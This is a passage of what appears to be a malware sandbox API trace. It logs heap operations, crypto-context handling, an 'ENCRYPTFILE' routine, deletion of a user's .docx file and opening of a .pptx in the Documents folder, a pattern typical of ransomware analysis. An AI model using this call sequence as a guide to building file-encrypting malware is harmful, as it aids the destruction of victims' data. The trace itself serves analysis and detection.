RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0077.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0077.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.862] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.862] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.864] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.864] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.864] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0077.864] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.865] CloseHandle (hObject=0x298) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.866] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.866] CloseHandle (hObject=0x258) returned 1 [0077.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.873] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx", lpFilePart=0x0) returned 0x2d [0077.874] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ozbdkszpyqazc9.docx")) returned 0x20 [0077.874] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadbfd0d0, ftCreationTime.dwHighDateTime=0x1d5b0eb, ftLastAccessTime.dwLowDateTime=0xacc27920, ftLastAccessTime.dwHighDateTime=0x1d5bce0, ftLastWriteTime.dwLowDateTime=0xacc27920, ftLastWriteTime.dwHighDateTime=0x1d5bce0, nFileSizeHigh=0x0, nFileSizeLow=0x13e27, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="oZbDkszpyQazC9.docx", cAlternateFileName="OZBDKS~1.DOC")) returned 0x41ac540 [0077.877] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ozbdkszpyqazc9.docx")) returned 1 [0077.890] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadbfd0d0, ftCreationTime.dwHighDateTime=0x1d5b0eb, ftLastAccessTime.dwLowDateTime=0xacc27920, ftLastAccessTime.dwHighDateTime=0x1d5bce0, ftLastWriteTime.dwLowDateTime=0xacc27920, ftLastWriteTime.dwHighDateTime=0x1d5bce0, nFileSizeHigh=0x0, nFileSizeLow=0x13e27, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="oZbDkszpyQazC9.docx", cAlternateFileName="OZBDKS~1.DOC")) returned 0 [0077.890] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0077.891] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.891] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b82780, ftCreationTime.dwHighDateTime=0x1d5d777, ftLastAccessTime.dwLowDateTime=0x5e34c700, ftLastAccessTime.dwHighDateTime=0x1d59cd2, ftLastWriteTime.dwLowDateTime=0x5e34c700, ftLastWriteTime.dwHighDateTime=0x1d59cd2, nFileSizeHigh=0x0, nFileSizeLow=0x15a35, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="QjLwz6.pptx", cAlternateFileName="QJLWZ6~1.PPT")) returned 0x41ac500 [0077.891] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0077.891] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.891] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.891] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0077.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca598, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0077.892] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qjlwz6.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0077.893] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, 